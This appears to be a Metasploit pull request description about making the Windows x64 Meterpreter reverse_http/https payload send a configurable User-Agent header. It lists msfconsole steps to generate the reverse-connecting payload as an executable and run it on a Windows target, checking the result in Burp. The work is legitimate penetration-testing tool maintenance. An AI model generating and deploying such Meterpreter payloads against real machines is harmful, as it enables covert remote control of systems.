Ensure Windows x64 Meterpreter HTTP/S Payloads Include the User Agent Header

[pczinser]

This code addresses an issue in the Windows x64 meterpreter staged reverse http, and by extension https, payload. These payloads do not make use of the HttpUserAgent option when it makes it's request to a listener e.g msf's exploit multi/handler. I have put a simple check in the inline assembly to include the User Agent if it is set. There is a default user agent for the payload so the default behavior of this payload will be to make requests with a user agent of Mozilla/5.0 (Windows NT 10 .0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 if no User Agent is desired simply set HttpUserAgent "" and the payload will not include a User Agent.

I encountered this issue organically but it seems to have been identified in #15886

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use payload/windows/x64/meterpreter/reverse_http
• set LHOST 127.0.0.1
• set LPORT 8080
• set HttpUserAgent verified123
• generate -f exe -o payload.exe
• if applicable, copy payload to a windows target
• launch Burp suite and ensure the proxy is listening on 127.0.0.1:8080 and is configured to forward to 127.0.0.1:8081 (don't actually need anything listening)
• ensure Burp is intercepting requests
• execute the payload
• observe a GET request with the the user agent header set properly 'User Agent: verified123'

below are some screenshots of my testing,

current behavior:

fixed behavior: